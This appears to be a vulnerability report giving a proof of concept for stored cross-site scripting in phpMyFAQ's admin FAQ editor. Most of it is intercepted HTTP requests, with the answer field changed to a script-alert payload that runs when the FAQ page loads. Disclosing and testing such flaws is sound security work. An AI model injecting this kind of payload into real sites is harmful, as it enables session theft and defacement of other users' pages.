Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Proof of Concept

Step 1: Go to Add New FAQ

Step 2: Add a FAQ

Step 3: Intercept the request

Original Request

POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1

Host: <DOMAIN>

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 386

Origin: http://<DOMAIN>

Connection: close

Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en

Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}

Upgrade-Insecure-Requests: 1



revision_id=0&record_id=8&openQuestionId=0&notifyUser=&notifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=%3Cp%3Etest%3C%2Fp%3E&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007

We can see this answer parameter -> answer=%3Cp%3Etest%3C%2Fp%3E

change the value of the answer parameter to <script>alert(document.domain)</script>

Edited Request

POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1

Host: <DOMAIN>

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 404

Origin: http://<DOMAIN>

Connection: close

Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en

Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}

Upgrade-Insecure-Requests: 1



revision_id=0&record_id=8&openQuestionId=0&notifyUser=&notifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=<script>alert(document.domain)</script>&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007

Step 4: Forward the FAQ request

Step 5: Go to the FAQ page

Step 6: XSS Triggered!